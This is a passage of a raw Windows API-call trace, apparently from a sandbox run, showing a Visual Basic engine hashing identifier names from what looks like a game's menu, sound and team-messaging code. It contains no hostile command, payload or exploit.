LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.220] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuRect") returned 0x102ffc [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IntersectRect") returned 0x108b90 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuRect") returned 0x102ffc [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rMouse") returned 0x10ec1e [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsMenu4") returned 0x106611 [0030.220] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="CheckRectsMenu4" | out: _Dst="CheckRectsMenu4") returned 0x0 [0030.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsMenuMenu1") returned 0x103713 [0030.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50b96, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0030.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50b96, cbMultiByte=19, lpWideCharStr=0xb4e31c8, cchWideChar=19 | out: lpWideCharStr="CheckRectsMenuMenu1") returned 19 [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rTemp") returned 0x108997 [0030.221] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="rTemp" | out: _Dst="rTemp") returned 0x0 [0030.221] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rTemp" | out: _Dst="rTemp") returned 0x0 [0030.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.221] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rMouse" | out: _Dst="rMouse") returned 0x0 [0030.221] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.221] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="rMouse" | out: _Dst="rMouse") returned 0x0 [0030.221] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.221] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="CheckRectsMenuMenu1" | out: _Dst="CheckRectsMenuMenu1") returned 0x0 [0030.221] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="CheckRectsMenuMenu1" | out: _Dst="CheckRectsMenuMenu1") returned 0x0 [0030.221] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="CheckRectsMenuMenu1" | out: _Dst="CheckRectsMenuMenu1") returned 0x0 [0030.221] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="CheckRectsMenuMenu1" | out: _Dst="CheckRectsMenuMenu1") returned 0x0 [0030.222] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="CheckRectsMenuMenu1" | out: _Dst="CheckRectsMenuMenu1") returned 0x0 [0030.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50c1e, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50c1e, cbMultiByte=8, lpWideCharStr=0x766cf98, cchWideChar=8 | out: lpWideCharStr="DoOption") returned 8 [0030.222] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="b" | out: _Dst="b") returned 0x0 [0030.222] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.222] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.222] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.222] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.222] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.222] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.222] CExposedStream::Read () returned 0x0 [0030.222] CExposedStream::Read () returned 0x0 [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.222] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsMenuMenu1") returned 0x103713 [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.222] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.223] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.223] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.223] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.223] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.223] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.223] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsMenuMenu2") returned 0x103714 [0030.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.224] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.224] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HData") returned 0x106743 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NumTeams") returned 0x1056f5 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b") returned 0x101059 [0030.224] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="b" | out: _Dst="b") returned 0x0 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lMsg") returned 0x10a881 [0030.224] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="lMsg" | out: _Dst="lMsg") returned 0x0 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MSG_TEAM") returned 0x103c5d [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lNewOffSet") returned 0x10aaac [0030.224] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="lNewOffSet" | out: _Dst="lNewOffSet") returned 0x0 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oNewMsg") returned 0x10d96d [0030.224] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddBufferData") returned 0x103ecc [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oNewMsg") returned 0x10d96d [0030.224] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VarPtr") returned 0x10a662 [0030.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lMsg") returned 0x10a881 [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lMsg") returned 0x10a881 [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lNewOffSet") returned 0x10aaac [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddBufferData") returned 0x103ecc [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oNewMsg") returned 0x10d96d [0030.236] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VarPtr") returned 0x10a662 [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b") returned 0x101059 [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b") returned 0x101059 [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lNewOffSet") returned 0x10aaac [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SendTo") returned 0x105310 [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oNewMsg") returned 0x10d96d [0030.236] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.237] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.237] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsMenuMenu3") returned 0x103715 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.237] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="gObjDSound") returned 0x10331c [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EnableSound") returned 0x108311 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EnableSound") returned 0x108311 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EnableSound") returned 0x108311 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.237] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cfgm") returned 0x108e50 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.237] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cfgm") returned 0x108e50 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.238] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cfgk") returned 0x108e4e [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KeyConfig") returned 0x10e9a3 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.238] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cfgk") returned 0x108e4e [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KeyConfig") returned 0x10e9a3 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.238] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cfgwv") returned 0x103970 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.238] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cfgwv") returned 0x103970 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.238] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.238] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.239] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsMenuMenu4") returned 0x103716 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.239] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stopping") returned 0x10a1ca [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.239] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.239] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NavMenu") returned 0x100c46 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.239] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsMenu4") returned 0x106611 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.239] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 